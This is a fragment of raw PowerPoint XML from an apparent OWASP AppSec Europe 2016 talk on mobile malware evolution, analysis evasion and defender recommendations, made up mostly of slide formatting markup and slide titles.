              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>jailbroken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r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devices</a:t>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr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Distribution:</a:t>
            </a:r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Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Out of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>AppStore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Aggressive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr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Apple’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>APIs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2" descr="http://i.computer-bild.de/imgs/7/1/5/9/7/3/1/YiSpecter-Schaedling-befaellt-jedes-iOS-Geraet-auch-die-ohne-Jailbreak-1024x576-f710582d2dfd63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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3608764" y="1200150"/>
            <a:ext cx="5281236" cy="2513495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6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Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2722397" y="1976647"/>
            <a:ext cx="2970750" cy="2284377"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59091"/>
              <a:gd name="adj2" fmla="val 2883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Android Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299083" y="1297901"/>
            <a:ext cx="3693364" cy="3656464"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4751741"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3656464"/>
              <a:gd name="connsiteX1" fmla="*/ 2452511 w 4751741"/>
              <a:gd name="connsiteY1" fmla="*/ 14596 h 3656464"/>
              <a:gd name="connsiteX2" fmla="*/ 4751741 w 4751741"/>
              <a:gd name="connsiteY2" fmla="*/ 3656464 h 3656464"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4751741"/>
              <a:gd name="connsiteY3" fmla="*/ 3649166 h 3656464"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 4751741"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 365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1741" h="3656464">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2452511" y="14596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4751741" y="3656464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3649166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="6F5D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 rot="10800000">
            <a:off x="4794471" y="1304334"/>
            <a:ext cx="4204305" cy="3656464"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4751741"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3656464"/>
              <a:gd name="connsiteX1" fmla="*/ 2452511 w 4751741"/>
              <a:gd name="connsiteY1" fmla="*/ 14596 h 3656464"/>
              <a:gd name="connsiteX2" fmla="*/ 4751741 w 4751741"/>
              <a:gd name="connsiteY2" fmla="*/ 3656464 h 3656464"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4751741"/>
              <a:gd name="connsiteY3" fmla="*/ 3649166 h 3656464"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 4751741"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 365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1741" h="3656464">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2452511" y="14596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4751741" y="3656464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3649166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D8A5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90940" y="1519330"/>
            <a:ext cx="1297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2011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07456" y="1519330"/>
            <a:ext cx="1325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/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2016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9731" y="2166408"/>
            <a:ext cx="1868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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google Play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is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>riddled with malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="30000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5354" y="3261150"/>
            <a:ext cx="2299230" cy="591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4" y="3381396"/>
            <a:ext cx="1655460" cy="38080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750637" y="2954625"/>
            <a:ext cx="2110337" cy="1591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217802" y="2166408"/>
            <a:ext cx="2613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dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3rd party stores are riddled with malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r"/>
            <a:endParaRPr lang="en-US" dirty="0"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255138" y="2510089"/>
            <a:ext cx="22166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3400"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Google introduces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technologies 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such as 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“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Bouncer</a:t>
            </a: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” and </a:t>
            </a:r>
            <a:b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“Verify Apps”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433" y="3023241"/>
            <a:ext cx="1834558" cy="1455280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26" descr="malwareIcon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="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7145">
            <a:off x="295399" y="4155088"/>
            <a:ext cx="806050" cy="888087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27" descr="malwareIcon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print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7145">
            <a:off x="5290122" y="1269916"/>
            <a:ext cx="1097212" cy="12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</TotalTime>
  <Words>815</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>205</Paragraphs>
  <Slides>36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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica Neue Condensed</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Menlo-Bold</vt:lpstr>
      <vt:lpstr>Menlo-Regular</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>The Ultimate Reason Why Hackers Are Winning The Mobile Malware Battle </vt:lpstr>
      <vt:lpstr>Meet The Speaker</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Mobile Malware Evolution</vt:lpstr>
      <vt:lpstr>Malware Evolution</vt:lpstr>
      <vt:lpstr>Mobile Malware Evolution</vt:lpstr>
      <vt:lpstr>XcodeGhost</vt:lpstr>
      <vt:lpstr>YiSpecter</vt:lpstr>
      <vt:lpstr>Evolution of Android Malware</vt:lpstr>
      <vt:lpstr>Circumventing APP SANDBOXING (WITHOUT RELYING ON ROOTING)</vt:lpstr>
      <vt:lpstr>App Sandboxing</vt:lpstr>
      <vt:lpstr>Security Implications of Accessibility Features</vt:lpstr>
      <vt:lpstr>Would You Fall For This?</vt:lpstr>
      <vt:lpstr>ACCESSIBILITY Clickjacking</vt:lpstr>
      <vt:lpstr>A Few Benign Features</vt:lpstr>
      <vt:lpstr>… Can Be Dangerous Together</vt:lpstr>
      <vt:lpstr>What About Lollipop?</vt:lpstr>
      <vt:lpstr>Malware Analysis Techniques and Why They Fail</vt:lpstr>
      <vt:lpstr>Signature-Based Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Analysis Automated User</vt:lpstr>
      <vt:lpstr>Evading Dynamic Analysis</vt:lpstr>
      <vt:lpstr>Static Analysis: The Automated Code Auditor</vt:lpstr>
      <vt:lpstr>Static Analysis: Taint Analysis</vt:lpstr>
      <vt:lpstr>Taint Analysis: Trade-Off Challenge</vt:lpstr>
      <vt:lpstr>Evading Static Analysis</vt:lpstr>
      <vt:lpstr>Evading Static Analysis</vt:lpstr>
      <vt:lpstr>How to detect malicious behavior, if it does not happen?</vt:lpstr>
      <vt:lpstr>App Repackaging</vt:lpstr>
      <vt:lpstr>Live Demo</vt:lpstr>
      <vt:lpstr>What about the CNC Server? Can it be blacklisted?</vt:lpstr>
      <vt:lpstr>So What Can Defenders Do?</vt:lpstr>
      <vt:lpstr>Recommendations</vt:lpstr>
      <vt:lpstr>AN ANECDOTE ABOUT ANOTHER FAMILY OF THREATS…</vt:lpstr>
      <vt:lpstr>Known iOS Vulnerabilities Apr. 15’ Est.</vt:lpstr>
      <vt:lpstr>Remember</vt:lpstr>
      <vt:lpstr>Q&amp;A And Next Steps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OWASP AppSec Europe 2016 template</dc:title>
  <dc:creator>OWASP AppSec Europe 2016</dc:creator>
  <dc:description>Background picture: This is Romaaaaa! (CC BY-NC-SA 2.0), https://flic.kr/p/8Xoxfq</dc:description>
  <cp:lastModifiedBy>Yair Amit</cp:lastModifiedBy>
  <cp:revision>103</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-11T17:41:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-07-01T15:24:20Z</dcterms:modified>
</cp:coreProperties>
</file>